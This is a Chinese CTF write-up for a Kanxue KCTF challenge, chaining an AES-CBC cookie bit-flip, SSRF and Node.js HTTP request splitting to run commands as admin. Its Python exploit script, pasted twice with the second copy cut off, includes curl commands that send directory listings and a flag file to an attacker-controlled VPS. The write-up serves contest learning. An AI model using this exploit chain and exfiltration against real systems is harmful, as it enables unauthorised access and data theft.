-
-
[原创] 看雪 2022 KCTF 秋季赛 第五题 灾荒蔓延
-
发表于: 2022-11-25 18:34
-
感叹一下:
访问题目,收到一个 cookie,长 64 的 hex 串。
访问 /admin 提示 you are not admin。稍微修改 cookie 的前部,得到 JsonParse error。更改 cookie 结尾,得到 Decrypt error。显然是一个 AES-CBC 而且还可以 padding oracle。
不难解出 cookie 明文 {"admin":"0"},其实不解也无所谓,逐个字节反转,可以发现页面突然提示 welcome admin, post cmd to /C00mmmmanD。
get /C00mmmmanD,提示又不是 admin 了。考虑到 /search 提供 ssrf,估计是需要从 127.0.0.1 访问。然后做一套 node http crlf。数据带外
flag{ohhh_Kctf_doyoulike_nodejs}
import requestsurl = '7e1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5#2x3q4)9J5k6e0p5#2z5q4)9J5k6e0p5^5i4K6u0W2x3e0x3%4i4K6y4m8y4e0x3J5z5g2)9J5c8W2)9J5y4H3`.`.r = requests.get(url)token = r.cookies['isadmin']token = bytearray.fromhex(token)token[10] ^= 1token = token.hex()print(token)cmd = 'curl vpsip -d "$(ls -al)"'cmd = 'curl vpsip -F a=@flag'payload = f'''admin HTTP/1.1Cookie: isadmin={token}POST /C00mmmmanD HTTP/1.1Cookie: isadmin={token}Content-Type: application/x-www-form-urlencodedContent-Length: {len(cmd)+4}cmd={cmd}GET /'''final_payload = 'http://localhost:5329/'for c in payload: if c.isalnum(): final_payload += c else: final_payload += chr(0x100 + ord(c))r = requests.get(url + 'search', params={'url': final_payload})print(r.text)import requestsurl = '7e1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5#2x3q4)9J5k6e0p5#2z5q4)9J5k6e0p5^5i4K6u0W2x3e0x3%4i4K6y4m8y4e0x3J5z5g2)9J5c8W2)9J5y4H3`.`.r = requests.get(url)token = r.cookies['isadmin']token = bytearray.fromhex(token)token[10] ^= 1token = token.hex()print(token)cmd = 'curl vpsip -d "$(ls -al)"'cmd = 'curl vpsip -F a=@flag'payload = f'''admin HTTP/1.1Cookie: isadmin={token}POST /C00mmmmanD HTTP/1.1Cookie: isadmin={token}Content-Type: application/x-www-form-urlencoded[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
